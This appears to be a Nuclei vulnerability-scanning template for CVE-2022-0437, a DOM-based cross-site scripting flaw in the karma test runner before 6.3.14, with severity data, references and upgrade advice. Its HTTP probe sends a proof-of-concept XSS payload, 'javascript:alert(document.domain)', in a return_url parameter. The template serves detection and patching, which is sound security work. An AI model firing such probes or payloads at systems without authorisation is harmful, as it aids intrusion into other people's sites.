id: CVE-2022-0437

info:
  name: karma-runner DOM-based Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: NPM karma prior to 6.3.14 contains a DOM-based cross-site scripting vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to karma 6.3.14 or later, which includes proper input sanitization to mitigate this vulnerability.
  reference:
    - https://huntr.dev/bounties/64b67ea1-5487-4382-a5f6-e8a95f798885
    - https://github.com/karma-runner/karma/commit/839578c45a8ac42fbc1d72105f97eab77dd3eb8a
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0437
    - https://github.com/karma-runner/karma
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0437
    cwe-id: CWE-79
    epss-score: 0.001
    epss-percentile: 0.40832
    cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 2
    vendor: karma_project
    product: karma
    framework: node.js
  tags: cve2022,cve,oss,huntr,karma,xss,karma_project,node.js

http:
  - method: GET
    path:
      - '{{BaseURL}}/karma.js'
      - '{{BaseURL}}/?return_url=javascript:alert(document.domain)'

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - compare_versions(version, '< 6.3.14')

      - type: word
        part: body_2
        words:
          - 'Karma'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "(?m)VERSION: '([0-9.]+)'"
        internal: true
# digest: 490a00463044022045da5c36fcf95d76d11cdc23a61d80ffd633cccbdf75ff6ae59b6182c47263fc022013144ed32ad39f0826140953867a536d90f76c5cfb05361967be396ab1d89268:922c64590222798bb761d5b6d8e72950